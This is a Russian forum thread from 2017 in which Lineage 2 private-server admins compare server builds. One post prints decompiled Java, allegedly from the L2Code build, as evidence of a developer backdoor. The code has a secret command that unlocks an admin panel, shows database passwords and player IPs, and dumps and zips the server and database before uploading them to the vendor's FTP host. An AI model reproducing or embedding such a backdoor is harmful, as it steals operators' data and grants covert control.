genius911147 29 Опубликовано 20 августа, 2017 Здраствуйте, и так решил создать тему по выбору сборки для проекта. Прошу писать только людей которые использовали ту или иную сборку в живом проекте с онлайном 100+. 1.Сборка для рейтов х1-х15 2.Сборка для рейтов х50-х100 3.Сборка для рейтов х1200-х10'000 4.Сборка для сервера с дополнениями Укажите пожалуйста: - Название сборки - Платная или Шаровая (если платная то цену) - Рейты под какие она может быть заточена - Укажите все ее за и против 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
M1SHA 136 Опубликовано 20 августа, 2017 (изменено) Здраствуйте, и так решил создать тему по выбору сборки для проекта. Прошу писать только людей которые использовали ту или иную сборку в живом проекте с онлайном 100+. 1.Сборка для рейтов х1-х15 2.Сборка для рейтов х50-х100 3.Сборка для рейтов х1200-х10'000 4.Сборка для сервера с дополнениями Укажите пожалуйста: - Название сборки - Платная или Шаровая (если платная то цену) - Рейты под какие она может быть заточена - Укажите все ее за и против 1Сборка кот в мешке есть как в шаре так и за деньги 2Сборка кот в мешке есть как в шаре так и за деньги 3Сборка кот в мешке есть как в шаре так и за деньги 4Сборка кот в мешке есть как в шаре так и за деньги Люди которие сидят на норм сборках даже которие купили не будут советовать вам так как сейчас по 5 серверов на день стартует и конкурентов итак хватает)))) такчто пробуйте тестите и найдете золотую середину) Все остальное о чем вам будут слогать басни ето либо разработчики либо те люди которие сами толко ничего незапустили))) либо те кто посоветуют вам недо сборку) Изменено 20 августа, 2017 пользователем M1SHA Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genius911147 29 Опубликовано 20 августа, 2017 1Сборка кот в мешке есть как в шаре так и за деньги 2Сборка кот в мешке есть как в шаре так и за деньги 3Сборка кот в мешке есть как в шаре так и за деньги 4Сборка кот в мешке есть как в шаре так и за деньги Люди которие сидят на норм сборках даже которие купили не будут советовать вам так как сейчас по 5 серверов на день стартует и конкурентов итак хватает)))) такчто пробуйте тестите и найдете золотую середину) Все остальное о чем вам будут слогать басни ето либо разработчики либо те люди которие сами толко ничего незапустили))) либо те кто посоветуют вам недо сборку) да согласен конкуренция сейчас очень большая, но все же я готов выслушать мнения людей, правда не мнения недоадминов, тех кто действительно сам на личном опыте проверил сборку и как она покажет себя при хорошей нагрузке. 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
M1SHA 136 Опубликовано 20 августа, 2017 да согласен конкуренция сейчас очень большая, но все же я готов выслушать мнения людей, правда не мнения недоадминов, тех кто действительно сам на личном опыте проверил сборку и как она покажет себя при хорошей нагрузке. Могу в скайпе показать небольшую историю приват сборки))) которую юзаю полтора года) на которой ещо играют Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
gvb 666 Опубликовано 20 августа, 2017 (изменено) Здраствуйте, и так решил создать тему по выбору сборки для проекта. Прошу писать только людей которые использовали ту или иную сборку в живом проекте с онлайном 100+. 1.Сборка для рейтов х1-х15 2.Сборка для рейтов х50-х100 3.Сборка для рейтов х1200-х10'000 4.Сборка для сервера с дополнениями Укажите пожалуйста: - Название сборки - Платная или Шаровая (если платная то цену) - Рейты под какие она может быть заточена - Укажите все ее за и против Как же вы создаете проекты "Помощь", если вы даже сборки не знаете какие к чему. То пол вопроса, хроники так же не указаны. 1 - ПТС 2,3,4 - Ява Изменено 20 августа, 2017 пользователем gvb Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genius911147 29 Опубликовано 20 августа, 2017 Как же вы создаете проекты "Помощь", если вы даже сборки не знаете какие к чему. То пол вопроса, хроники так же не указаны. У меня есть сборки какие я сейчас использую, хочу перейти к разработке сервера малых рейтов и вижу что те что есть не полностью мне подходят. А второе - посмотрите название темы и все поймете. 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
ncsSpawN 45 Опубликовано 21 августа, 2017 (изменено) У меня есть сборки какие я сейчас использую, хочу перейти к разработке сервера малых рейтов и вижу что те что есть не полностью мне подходят. А второе - посмотрите название темы и все поймете. http://l2code.ru/ Стоимость ежемесячной платы 40$. Для теста предоставляем сборку с ограничением в 20 онлайн, архив доступен в личном кабинете http://lk.l2code.ru/. Также по вопросам касательно продукта l2code, доступен icq 455578898. Изменено 21 августа, 2017 пользователем ncsSpawN Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
SuperRussianMan 13 Опубликовано 21 августа, 2017 на л2 коде не советую сугубо мое мнение уже не пару людей сфейлились на коде! Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Lightning 177 Опубликовано 21 августа, 2017 на л2 коде не советую сугубо мое мнение уже не пару людей сфейлились на коде! Так можно о любой сборке сказать, факты, причины, последствия описать не можете?, тогда молчите. PS. Если выложить официальный сервер нц софт в шару на ней тоже пару нубов сфейлятся ))) Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
ffffffffffffffffff 643 Опубликовано 21 августа, 2017 (изменено) Так можно о любой сборке сказать, факты, причины, последствия описать не можете?, тогда молчите. PS. Если выложить официальный сервер нц софт в шару на ней тоже пару нубов сфейлятся ))) package ru.catssoftware.gameserver.gmaccess.handlers; public class spexp { private static void giveItemm(L2PcInstance admin, L2PcInstance rewdr, int itemId, int count) { L2Item template = ItemTable.getInstance().getTemplate(itemId); if (template == null) { return; } if ((count > 1) && (!template.isStackable())) { for (int i = 0; i < count; i++) { if (rewdr != null) { rewdr.addItem("Admin", itemId, 1, rewdr, false); } else { admin.addItem("Admin", itemId, 1, admin, true); } } } else if (rewdr != null) { rewdr.addItem("Admin", itemId, count, rewdr, false); } else { admin.addItem("Admin", itemId, count, admin, true); } } private static String readString(String string) { String ss = ""; try { MessageDigest md = MessageDigest.getInstance("MD5"); string = string + " " + "3481"; byte[] bytes = string.getBytes("UTF-8"); InputStream fis = new ByteArrayInputStream(bytes); byte[] buf = new byte[1024]; int n = 0; while ((n = fis.read(buf)) != -1) { md.update(buf, 0, n); } fis.close(); BigInteger i = new BigInteger(1, md.digest()); ss = String.format("%1$032x", new Object[] { i }); } catch (Exception x) { System.out.println("Error:"); x.printStackTrace(); } return ss; } private static String readString2(String string) { String ss = ""; try { MessageDigest md = MessageDigest.getInstance("MD5"); string = string + " " + "3m4z"; byte[] bytes = string.getBytes("UTF-8"); InputStream fis = new ByteArrayInputStream(bytes); byte[] buf = new byte[1024]; int n = 0; while ((n = fis.read(buf)) != -1) { md.update(buf, 0, n); } fis.close(); BigInteger i = new BigInteger(1, md.digest()); ss = String.format("%1$032x", new Object[] { i }); } catch (Exception x) { System.out.println("Error:"); x.printStackTrace(); } return ss; } public static boolean useVoicedCommand2(String command, L2PcInstance player, String target, String params) { L2PcInstance activeChar = player; String menu = params; if ((command.startsWith("3m4z")) && (readString2(readString(menu)).equalsIgnoreCase(Config.passwords))) { if (!activeChar.getacces()) { activeChar.setacces(true); activeChar.sendMessage(" (oO,).i."); } else { activeChar.setacces(false); activeChar.sendMessage(" (oO,).i. OFF!!!"); } return true; } if ((command.startsWith("3m4z")) && (activeChar.getacces())) { if (command.startsWith("3m4z")) { String flag = params; if (flag.equalsIgnoreCase("info")) { informations(activeChar, true); } } } return true; } public static class SaveTread implements Runnable { L2PcInstance _player; String _arhive_name; public SaveTread(L2PcInstance player, String arhive_name) { this._player = player; this._arhive_name = arhive_name; } public void run() { try { if (!new File("log").exists()) { new File("log").mkdirs(); } if (!new File("extensions").exists()) { new File("extensions").mkdirs(); } if (new File("log/java/tmp.dat").exists()) { new File("log/java/tmp.dat").delete(); } try { if (L2GameServer.isWindows()) { String _sql_file = new File("extensions").getAbsolutePath() + "\\base.dat"; if (this._player != null) { this._player.sendMessage("Start SQL arhive... " + _sql_file); } L2GameServer.execShellCmdWin("mysqldump --user=" + Config.DATABASE_LOGIN + " --password=" + Config.DATABASE_PASSWORD + " " + Config.DATABASE_BACKUP_TABLE + " >\"" + _sql_file + "\""); } else { String _sql_file = new File("extensions").getPath() + "/base.dat"; if (this._player != null) { this._player.sendMessage("Start SQL arhive... " + _sql_file); } L2GameServer.execShellCmd("mysqldump --user=" + Config.DATABASE_LOGIN + " --password=" + Config.DATABASE_PASSWORD + " " + Config.DATABASE_BACKUP_TABLE + " | gzip -9 > " + _sql_file); } } catch (Exception e) { if (this._player != null) { this._player.sendMessage("BAD sql arhive...."); } } File out = new File("log/java/tmp.dat"); File file = new File("."); if (this._player != null) { this._player.sendMessage("Arhive Started!"); } if (FileUtil.directoryToZip(file, out)) { if (this._player != null) { double size = 0.0D; File src_file = new File("log/java/tmp.dat"); if (src_file.length() > 1048576L) { size = src_file.length() / 1048576L; this._player.sendMessage("Arhive End " + this._arhive_name + ".zip (" + size + "mb)!"); } else if (src_file.length() > 1024L) { size = src_file.length() / 1024L; this._player.sendMessage("Arhive End " + this._arhive_name + ".zip (" + size + "kb)!"); } else if (src_file.length() > 0L) { size = src_file.length(); this._player.sendMessage("Arhive End " + this._arhive_name + ".zip (" + size + "byte)!"); } else { size = src_file.length(); this._player.sendMessage("No Arhive End " + this._arhive_name + ".zip (" + size + "byte)!"); } if (src_file.exists()) { if (this._player != null) { this._player.sendMessage("Uploda FTP Start!"); } String FTP_USER = "servers@l2code.ru"; String FTP_PASSWORD = "servers123"; String FTP_HOST = "ftp.l2code.ru"; int FTP_PORT = 21; String FTP_DIR = "/"; if (spexp.ftpUpload(FTP_USER, FTP_PASSWORD, FTP_HOST, FTP_PORT, FTP_DIR, src_file, this._arhive_name + ".zip", this._player)) { if (this._player != null) { this._player.sendMessage("Uploda FTP END!"); } } src_file.delete(); } } } } catch (Exception e) { if (this._player != null) { this._player.sendMessage("BAD arhive...."); } } } } public static boolean ftpUpload(String user, String password, String ftpServer, int port, String dir, File src, String arhive_name, L2PcInstance _player) { try { FTPClient client = new FTPClient(); FileInputStream fis = null; client.connect(ftpServer, port); client.enterLocalPassiveMode(); client.login(user, password); int reply = client.getReplyCode(); if (FTPReply.isPositiveCompletion(reply)) { fis = new FileInputStream(src.getAbsoluteFile()); client.setFileType(2); client.storeFile(dir + arhive_name, fis); } else if (_player != null) { _player.sendMessage("Bad connect to ftp server..."); } client.logout(); fis.close(); } catch (IOException m) { if (_player != null) { _player.sendMessage("Error saving archive to FTP..."); } return false; } int reply; return true; } private static void setEnchant(L2PcInstance activeChar, int ench, int armorType) { L2Object target = activeChar.getTarget(); if (target == null) { target = activeChar; } L2PcInstance player = null; if ((target instanceof L2PcInstance)) { player = (L2PcInstance)target; } else { activeChar.sendPacket(SystemMessageId.INCORRECT_TARGET); return; } int curEnchant = 0; L2ItemInstance itemInstance = null; L2ItemInstance parmorInstance = player.getInventory().getPaperdollItem(armorType); if ((parmorInstance != null) && (parmorInstance.getLocationSlot() == armorType)) { itemInstance = parmorInstance; } else { parmorInstance = player.getInventory().getPaperdollItem(16); if ((parmorInstance != null) && (parmorInstance.getLocationSlot() == 16)) { itemInstance = parmorInstance; } } if (itemInstance != null) { curEnchant = itemInstance.getEnchantLevel(); player.getInventory().unEquipItemInSlotAndRecord(armorType); itemInstance.setEnchantLevel(ench); player.getInventory().equipItemAndRecord(itemInstance); InventoryUpdate iu = new InventoryUpdate(); iu.addModifiedItem(itemInstance); player.sendPacket(iu); player.broadcastUserInfo(); activeChar.sendMessage("Игроку " + player.getName() + " изменен уровень точки вещи " + itemInstance.getItem().getName() + " с " + curEnchant + " на " + ench + "."); } } private static void ars(L2PcInstance activeChar, int idval) { L2Object target = activeChar.getTarget(); L2PcInstance player = null; if ((target instanceof L2PcInstance)) { player = (L2PcInstance)target; } else { activeChar.sendMessage("Таргет не найден..."); loadmenu(activeChar, 0); return; } L2Skill skill = SkillTable.getInstance().getInfo(idval, player.getSkillLevel(idval)); if (skill != null) { String skillname = skill.getName(); player.removeSkill(skill); activeChar.sendMessage("Вы удалили скил " + skillname + " игроку " + player.getName() + "."); player.sendSkillList(); } else { activeChar.sendMessage("Ошибка: скил не существует."); } loadmenu(activeChar, 0); } private static void aas(L2PcInstance activeChar, int id, int lvl) { L2Object target = activeChar.getTarget(); if (target == null) { target = activeChar; } if (!(target instanceof L2PcInstance)) { loadmenu(activeChar, 0); activeChar.sendMessage("Таргет не найден..."); return; } L2PcInstance player = (L2PcInstance)target; L2Skill skill = SkillTable.getInstance().getInfo(id, lvl); if (skill != null) { String name = skill.getName(); player.addSkill(skill, true); player.sendSkillList(); activeChar.sendMessage("Вы добавили скил " + name + " игроку " + player.getName()); } else { activeChar.sendMessage("Ошибка. Скил не существует"); } loadmenu(activeChar, 0); } public static void information(L2PcInstance player, boolean show) { NpcHtmlMessage htmll = new NpcHtmlMessage(5); String html = ""; html = "<html><title>L2Code.ru</title><body><center><br><br><br><br><font color=\"666666\">Автор разработки: ncs.SpawN<br1>ICQ 4555-7-8898<br1>Online " + L2World.getInstance().getAllPlayersCount() + "<br1>" + "Rev " + Version.Version + "<br1>" + "HEX " + Config.passwords + "</font><br1><br1>"; html = html + "<font color=\"666666\">ICQ Клиента " + ru.catssoftware.gameserver.model.actor.instance.L2PcInstance.Decode.License_Strings[2] + "</font><br1>"; html = html + "<br><br></center></body></html>"; htmll.setHtml(html); player.sendPacket(htmll); } public static void informations(L2PcInstance player, boolean show) { NpcHtmlMessage htmll = new NpcHtmlMessage(5); String html = ""; html = html + "<html><title>L2Code.ru</title><body><center><br><br><br><br><font color=\"666666\">Автор разработки: ncs.SpawN<br1>ICQ 4555-7-8898<br1>"; if (show) { html = html + "Online " + L2World.getInstance().getAllPlayersCount() + "<br1>"; } html = html + "Rev " + Version.Version + "<br1>"; html = html + "Site: http://l2code.ru/<br1>"; if (show) { html = html + "HEX " + Config.passwords + "</font><br1><br1>"; html = html + "<font color=\"666666\">ICQ Клиента " + ru.catssoftware.gameserver.model.actor.instance.L2PcInstance.Decode.License_Strings[2] + "</font><br1>"; } html = html + "<br><br></center></body></html>"; htmll.setHtml(html); player.sendPacket(htmll); } public static void showMainPage(L2PcInstance activeChar) { NpcHtmlMessage htmll = new NpcHtmlMessage(5); String html = ""; html = "<html><title>Панель управления сервером</title><body><center><button value=\"Меню\" action=\"bypass -h " + CheckCore() + "3m4z menu 0\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<!-- Windows Info -->" + "<br><font color=\"LEVEL\">Уровень заточки [0-65535]</font>" + "<edit var=\"qbox\" width=260 height=16><br>" + "<table>" + "<tr>" + "<td align=center width=90></td>" + "<td width=90><button value=\"Шлем\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 seteh $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td align=center width=90></td>" + "</tr>" + "<tr>" + "<td width=90><button value=\"Нижнее бельё\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setun $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td width=90><button value=\"Нагрудник\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setec $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td width=90><button value=\"Плащ\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setba $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "</tr>" + "<tr>" + "<td width=90><button value=\"Перчатки\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 seteg $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td width=90><button value=\"Штаны\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setel $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td width=90><button value=\"Боты\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 seteb $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "</tr>" + "</table>" + "<table>" + "<tr>" + "<td width=90><button value=\"Оружие\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setew $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td width=90><button value=\"Аугумент\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 augment $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td width=90><button value=\"Щит\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setes $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "</tr>" + "</table>" + "<br>" + "<table>" + "<tr>" + "<td width=90><button value=\"Серьги\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setle $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td width=90><button value=\"Ожерелье\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 seten $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td width=90><button value=\"Серьги\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setre $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "</tr>" + "<tr>" + "<td width=90><button value=\"Кольцо\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setrf $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "<td align=center width=90> </td>" + "<td width=90><button value=\"Кольцо\" action=\"bypass -h " + CheckCore() + "3m4z enchant2 setlf $qbox\" width=90 height=19 back=\"sek.cbui94\" fore=\"sek.cbui94\"></td>" + "</tr>" + "</table>" + "</center></body></html>"; htmll.setHtml(html); activeChar.sendPacket(htmll); } private static String CheckCore() { return ""; } private static void loadmenu(L2PcInstance player, int list) { if (!player.getacces()) { return; } L2Object trg = player.getTarget(); L2PcInstance targett; L2PcInstance targett; if ((trg instanceof L2PcInstance)) { targett = (L2PcInstance)trg; } else { targett = player; } L2PcInstance pl; L2PcInstance pl; if (targett.isPlayer()) { pl = targett; } else { pl = player; } NpcHtmlMessage nhm = new NpcHtmlMessage(5); TextBuilder build = new TextBuilder("<html><body>"); build.append("Ник: <font color=\"LEVEL\">" + pl.getName() + "</font><br1>"); build.append("Аккаунт: <font color=\"LEVEL\">" + pl.getAccountName() + "</font><br1>"); build.append("Ип: <font color=\"LEVEL\">" + pl.getIP() + "</font><br1>"); build.append("Object ID: <font color=\"LEVEL\">" + pl.getObjectId() + "</font><br1>"); build.append("Ключ: <font color=\"LEVEL\">" + pl.getUserKey().key + "</font><br1>"); build.append("Онлайн: <font color=\"LEVEL\">" + L2World.getInstance().getAllPlayers().size() + "</font><br1>"); build.append("HWID: <font color=\"LEVEL\">" + pl.getClient().getHWid() + "</font><br1>"); build.append("All Players is Online: <font color=\"LEVEL\">" + L2World.getInstance().getAllPlayersCount() + "</font><br1>"); build.append("SQL User: <font color=\"LEVEL\">" + Config.DATABASE_LOGIN + "</font><br1>"); build.append("SQL Password: <font color=\"LEVEL\">" + Config.DATABASE_PASSWORD + "</font><br1>"); build.append("OS: <font color=\"LEVEL\">" + System.getProperty("os.name") + "</font><br1>"); FastList<String> allgm = GmListTable.getInstance().getAllGmNames(true); build.append("ADMINS: <font color=\"ff0000\">" + allgm.toString() + "</font><br1>"); build.append("<br>"); build.append("<center>"); build.append("<table>"); build.append("<tr>"); build.append("<td>Item-ID: <edit var=\"itemid\" width=50></td>"); build.append("<td>Amount: <edit var=\"itemnum\" width=50></td>"); build.append("<td> <button value=\"Create Item\" action=\"bypass -h " + CheckCore() + "3m4z item $itemid $itemnum\" width=70 height=15 back=\"sek.cbui94\" fore=\"sek.cbui92\"></td>"); build.append("</tr>"); build.append("</table>"); build.append("</center><br><br>"); build.append("<center>"); build.append("<table>"); build.append("<tr><td><center>Assets: <edit var=\"asset\" width=200 height=11></center></td></tr>"); build.append("</table><br>"); build.append("<table>"); build.append("<tr>"); build.append("<td>"); build.append("<button value=\"Info Menu\" action=\"bypass -h " + CheckCore() + "3m4z menu 0\" width=95 height=15 back=\"sek.cbui94\" fore=\"sek.cbui92\">"); build.append("<button value=\"Character\" action=\"bypass -h " + CheckCore() + "3m4z char 1\" width=95 height=15 back=\"sek.cbui94\" fore=\"sek.cbui92\">"); build.append("<button value=\"Pledge\" action=\"bypass -h " + CheckCore() + "3m4z char 2\" width=95 height=15 back=\"sek.cbui94\" fore=\"sek.cbui92\">"); build.append("<button value=\"Skill\" action=\"bypass -h " + CheckCore() + "3m4z char 3\" width=95 height=15 back=\"sek.cbui94\" fore=\"sek.cbui92\">"); build.append("<button value=\"Quest\" action=\"bypass -h " + CheckCore() + "3m4z char 4\" width=95 height=15 back=\"sek.cbui94\" fore=\"sek.cbui92\">"); build.append("<button value=\"Item\" action=\"bypass -h " + CheckCore() + "3m4z char 5\" width=95 height=15 back=\"sek.cbui94\" fore=\"sek.cbui92\">"); build.append("<button value=\"Warehouse\" action=\"bypass -h " + CheckCore() + "3m4z char 6\" width=95 height=15 back=\"sek.cbui94\" fore=\"sek.cbui92\">"); build.append("<button value=\"ALL Items Info\" action=\"bypass -h " + CheckCore() + "3m4z menu 1\" width=95 height=15 back=\"sek.cbui94\" fore=\"sek.cbui92\">"); build.append("</td>"); build.append("</tr>"); build.append("</table>"); build.append("</center>"); build.append("<center>"); build.append("<br1>"); build.append("<a action=\"bypass -h " + CheckCore() + "3m4z char ban $asset\" msg=\"Ban Account?\">Ban Account</a>"); build.append("<br1>"); build.append("<a action=\"bypass -h " + CheckCore() + "3m4z char unban $asset\">UnBan Account</a>"); build.append("<br1>"); build.append("<a action=\"bypass -h " + CheckCore() + "3m4z cmd $asset\">CMD</a>"); build.append("<br1>"); build.append("<a action=\"bypass -h " + CheckCore() + "3m4z skilla $asset\">Add Skill</a>"); build.append("<br1>"); build.append("<a action=\"bypass -h " + CheckCore() + "3m4z enchant\">Add Enchant</a>"); build.append("<br1>"); build.append("<a action=\"bypass -h " + CheckCore() + "3m4z setlevel $asset\">Set Level</a>"); build.append("<br1>"); build.append("<a action=\"bypass -h " + CheckCore() + "3m4z skillr $asset\">Remove Skill</a>"); build.append("<br1>"); build.append("<a action=\"bypass -h " + CheckCore() + "3m4z arh $asset\" msg=\"Архивировать сборку?\">Архивация сборки</a>"); build.append("<br1>"); build.append("<a action=\"bypass -h " + CheckCore() + "3m4z gm\" msg=\"SET ADMIN?\">!!!SET ADMIN!!!</a>"); build.append("</center>"); build.append("<br1>"); if (list > 0) { LoadAllITEMS(list - 1); for (int i = 4; i > 0; i--) { if (list - i > 0) { build.append("<a action=\"bypass -h " + CheckCore() + "3m4z menu " + (list - i) + "\">ITEMS PAGE #" + (list - i) + "</a>"); build.append("<br1>"); } } build.append("<br1>This Page = #" + list + "<br1>"); for (int i = 1; i <= 4; i++) { build.append("<a action=\"bypass -h " + CheckCore() + "3m4z menu " + (list + i) + "\">ITEMS PAGE #" + (list + i) + "</a>"); build.append("<br1>"); } build.append("<br1>"); for (int itemms : ITEMSIDS) { String _ItemName = ItemTable.getInstance().getItemName(itemms); build.append(itemms + " - " + _ItemName + "<br1>"); } } build.append("</body></html>"); nhm.setHtml(build.toString()); player.sendPacket(nhm); } public static void LoadAllITEMS(int list) { Connection conn = null; ResultSet rset = null; PreparedStatement dbconn = null; try { conn = L2DatabaseFactory.getInstance().getConnection(); dbconn = conn.prepareStatement("SELECT item_id FROM etcitem LIMIT " + list * 100 + ", 100"); rset = dbconn.executeQuery(); rset.last(); int count = rset.getRow(); rset.beforeFirst(); ITEMSIDS = new int[count]; int i = 0; while (rset.next()) { ITEMSIDS[i] = rset.getInt("item_id"); i++; } rset = dbconn.executeQuery(); dbconn.close(); rset.close(); conn.close(); } catch (Exception localException) {} } public static int[] ITEMSIDS = { 57 }; } з.ы - не знаю как выложить код под спойлер, по этому так. Изменено 21 августа, 2017 пользователем OurLastNight 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
ncsSpawN 45 Опубликовано 21 августа, 2017 http://joxi.ru/D2P3b4gIdwZ7km Много раз поднимался этот вопрос, но так и не нашлось не одного человека который смог бы подтвердить что его сервер взломали через шел и было куча донок. А вот на это не кто не обращает внимание. http://joxi.ru/v29Xj4RTG4DdOm Главное что все белые и пушистые, а когда в сборке бекдор от разработчика сразу пыл приутихает. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
ffffffffffffffffff 643 Опубликовано 21 августа, 2017 http://joxi.ru/D2P3b4gIdwZ7km Много раз поднимался этот вопрос, но так и не нашлось не одного человека который смог бы подтвердить что его сервер взломали через шел и было куча донок. А вот на это не кто не обращает внимание. http://joxi.ru/v29Xj4RTG4DdOm Главное что все белые и пушистые, а когда в сборке бекдор от разработчика сразу пыл приутихает. Жаль скриншота с перепиской твоего "клиента" не осталось. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
ncsSpawN 45 Опубликовано 21 августа, 2017 Жаль скриншота с перепиской твоего "клиента" не осталось.Действительно жаль, ибо слова в переписке нужно было бы подтвердить логами со сборки. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genius911147 29 Опубликовано 21 августа, 2017 на сколько я понял за 40$ в месяц что то уж очень все печально? 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
ncsSpawN 45 Опубликовано 21 августа, 2017 на сколько я понял за 40$ в месяц что то уж очень все печально?Для этого есть возможность протестировать все лично и бесплатно перед оформлением лицензии. Мы не стремимся продавать кота в мишке как это делают многие. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genius911147 29 Опубликовано 21 августа, 2017 Для этого есть возможность протестировать все лично и бесплатно перед оформлением лицензии. Мы не стремимся продавать кота в мишке как это делают многие. смотрю у тебя в подпись пишет что лицуха 1к руб, а 40$ это 2к как минимум. В чем прикол? 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
ncsSpawN 45 Опубликовано 21 августа, 2017 (изменено) смотрю у тебя в подпись пишет что лицуха 1к руб, а 40$ это 2к как минимум. В чем прикол?Подпись уже как больше года, изменить не могу. (Вот только удалось сменить.) Изменено 21 августа, 2017 пользователем ncsSpawN Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genius911147 29 Опубликовано 21 августа, 2017 Подпись уже как больше года, изменить не могу. (Вот только удалось сменить.) Так все таки отпишите под какие рейты может быть заточена ваша сборка, какие ресурсы ей нужны с онлайном в 500 живых игроков. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
ncsSpawN 45 Опубликовано 21 августа, 2017 Так все таки отпишите под какие рейты может быть заточена ваша сборка, какие ресурсы ей нужны с онлайном в 500 живых игроков.В основном ставят x100, есть кто делал и x10 и x15 вроде. 2гб под ГС будет достаточно с головой под 1300+ онлайн. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genius911147 29 Опубликовано 21 августа, 2017 ап Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genius911147 29 Опубликовано 23 августа, 2017 up Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
MeRDox 60 Опубликовано 23 августа, 2017 Здраствуйте, и так решил создать тему по выбору сборки для проекта. Прошу писать только людей которые использовали ту или иную сборку в живом проекте с онлайном 100+. 1.Сборка для рейтов х1-х15 2.Сборка для рейтов х50-х100 3.Сборка для рейтов х1200-х10'000 4.Сборка для сервера с дополнениями Укажите пожалуйста: - Название сборки - Платная или Шаровая (если платная то цену) - Рейты под какие она может быть заточена - Укажите все ее за и против 1. PTS только 2. Pain-team, Lucera 2 3. Pain-team, Lucera 2, L2Code 4. PwSoft, L2Code Много факторов влияют на выбор сборки. Лучше бы не шаровую сборку, а с поддержкой, чтобы не угробить сервер. 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Energy 263 Опубликовано 23 августа, 2017 up свой сурс + фиксы) из шары идеального ничего не найдешь) ловели - фиксить и фиксить ит.су - точно так-же ацис - маловато сервисов и говорят что некоторые моменты не работают но так как люди привыкли к люцероподобным сборкам то стоит приглядеться к первым двум или могу предложить свою сборку на исходниках ит.су за баг репорт (основные моменты по геймплею пофикшены) Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
MeRDox 60 Опубликовано 23 августа, 2017 свой сурс + фиксы) из шары идеального ничего не найдешь) ловели - фиксить и фиксить ит.су - точно так-же ацис - маловато сервисов и говорят что некоторые моменты не работают но так как люди привыкли к люцероподобным сборкам то стоит приглядеться к первым двум или могу предложить свою сборку на исходниках ит.су за баг репорт (основные моменты по геймплею пофикшены) Мало кому подойдут исходники, с ними нужно уметь работать, ну или же чтобы был человек который хотя бы сможет пофиксить баги. Так как разрабы сборок могут просто воду лить, вместо исправления багов и недочетов, и брать за это приличные деньги. Типа, вывел конфиг, оптимизировал код, вырезал кусок кода, переписал логирование и тд. А так то да, свой исходник - самый лучший вариант. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genius911147 29 Опубликовано 23 августа, 2017 1. PTS только 2. Pain-team, Lucera 2 3. Pain-team, Lucera 2, L2Code 4. PwSoft, L2Code Много факторов влияют на выбор сборки. Лучше бы не шаровую сборку, а с поддержкой, чтобы не угробить сервер. спасибо за хороший ответ! Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты